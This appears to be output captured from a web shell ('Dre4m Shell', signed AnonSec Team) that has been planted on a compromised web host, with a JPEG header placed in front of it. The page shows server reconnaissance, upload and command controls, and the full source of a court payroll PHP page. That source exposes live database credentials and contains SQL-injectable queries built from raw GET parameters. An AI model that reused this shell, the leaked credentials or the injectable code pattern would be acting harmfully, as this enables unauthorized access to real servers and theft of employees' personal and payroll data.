ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.133.126.232
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/consolidated/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5//consolidated/penames.php
<?php
//require_once('business login/classes/.php');
require_once('business logic/classes/users.php');

$user = new User();
$uid = $_SESSION['uid'];
$access = $_SESSION['acc'];
//
if($access > 2)
   header("location:delay.php");

if (!$user->get_session())
{
   header("location:myown_mainpage.php?you are not login");
}
//
if (isset($_GET['q']) and $_GET['q'] == 'logout') 
{
    $user->user_logout();
    header("location:myown_mainpage.php? you are log out");
}

?>

<?php 
$con = mysqli_connect("localhost","nicngov_payroll","_nicn.payroll@","nicngov_payroll");

$arrears = mysqli_query($con, " select * from tblarrears where year = 2016 and fileno = 1002");
    foreach ($arrears as $key) {
      
    }
    $year = $_GET['yr'];
    $bank = $_GET['bank'];
    $bankGroup = $_GET['bgroup'];
    $div = $_GET['div'];
    $rank = $_GET['rk'];
    $_SESSION['division'] = $div;
 ?>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="images/favicon.ico">
<title>National Industrial Court of Nigeria...::...Classification Code</title>
<link rel="stylesheet" href="bootstrap.min.css">
<link href="css/payroll.css" rel="stylesheet" type="text/css" />
<style type="text/css">
<!--
.style25 {	font-family: Verdana, Arial, Helvetica, sans-serif;
	color: #FF0000;
}
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: underline;
}
a:active {
	text-decoration: none;
}
.inputs {	background-color: #ffffff;
	margin: 2px;
	padding: 2px;
	border: 1px solid #FF8A00;
}
-->
table
    {
      border:none;
      padding: 0px;
      width:100%;
    }
    table tr td
    {
      border: 1px solid #eee;
      padding: 6px 10px;
      border-right: none;
      border-left: none;
      border-top: none;
      font-size: 13px;
    }
     table tr th
    {
      border: 1px solid #eee;
      padding: 3px 10px;
      font-size: 15px;
    }
    .id
    {
      margin-top: 25px;
    }
    .text-success
    {
      font-size: 20px;
    }
</style>
<script language="javascript" type="text/javascript"> 
function submitregistration() {
 var form = document.login;
				
     
 
if(form.name.value == "")
{
alert( "Enter Bank Name" );
return false;
}
else if(form.branch.value == "")
{
alert( "Enter Bank Branch" );
return false;
}

else if( form.sort_code.value == "")
{
alert( "Enter Sort Code " );
return false;
}
  
}
</script> 
<script language="javascript" src="js/cal2.js">
/*
Xin's Popup calendar script-  Xin Yang (http://www.yxscripts.com/)
Script featured on/available at http://www.dynamicdrive.com/
This notice must stay intact for use
*/
</script>
<script language="javascript" src="js/cal_conf2.js"></script>
</head>

<body onLoad="document.login.name.focus()">
<table width="744" border="0" cellpadding="0" cellspacing="0" class="container" align="center" >
  <!--DWLayoutTable-->
  <tr>
    <td width="800" height="42" colspan="2" valign="top"><?php require_once('header.php');?></td>
  </tr>
  <tr>
    <td height="19" colspan="2" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0" class="bottomborder">
      <!--DWLayoutTable-->
      <tr>
        <td width="33%">&nbsp;<a href="userArea.php">Home</a> </td>
        <td width="67%"><?php 
			 //$user->getLink($access);
			  $user->get_fullname($uid);
		
		?><a href="?q=logout">Logout</a>&nbsp;</td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td height="243" valign="top"><?php require('links.php');?>
<br /></td>
    <td valign="top"><table width="100%" border="0" align="left" cellpadding="0" cellspacing="0">
      <tr>
        <td width="310" colspan="3">
        <div class="box-body">
    <div class="row id">
    <div class="col-md-8 col-md-offset-2">
      <b><p class=" text-center text-success">NATIONAL INDUSTRIAL COURT OF NIGERIA
      </p></b>
      <b><p class="text-center text-success">PAYROLL</p></b>
      <b><p class="text-muted text-left ">Payroll P.V. No:</p></b>
      <p class="text-muted text-left ">MINISTRY/DEPARTMENT: NATIONAL INDUSTRIAL COURT OF NIGERIA, ABUJA DIVISION </p>
      <b><p class="text-muted text-left "> MONTH ENDING: <?php echo $bank.", ".$bankGroup; ?></p></b>
   </div>
      <div class="col-md-8 col-md-offset-2">
        
        <table border="1" width="100%" cellspacing="6">
          <tr>
          <th width="18%">File Number</th>
          <th>NAMES</th>
          </tr>
          
          <?php $i = 1;

          $judges  = mysqli_query($con,"select * from tblper join tblbanklist on tblbanklist.bank = tblper.bank where tblbanklist.bank ='$bank' and tblper.bankGroup = '$bankGroup' and tblper.employee_type = 'CONSOLIDATED' and tblper.staff_status = 1 and tblper.rank = '$rank' ");
          
          while($s = mysqli_fetch_assoc($judges))
          {
          echo ' <tr>
                 <td>'.$s["fileNo"].'</td>
                 <td> 
                 <a  href = "pereport.php?fno='.$s["fileNo"].'&year='.$year.' "> 
                    '.$s['surname'].'
                  </a>
                  </td>
                  </tr>';
          }
          ?>
        </table>
      </div>     
    </div>
  </div><!-- /.col -->
</div><!-- /.row -->

        </td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td height="20" colspan="2" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0">
      <!--DWLayoutTable-->
      <tr>
        <td>
		</td>
      </tr>
    </table></td>
  </tr>
</table>
</body>
</html>
<?php $user->close();?>

Anon7 - 2022
AnonSec Team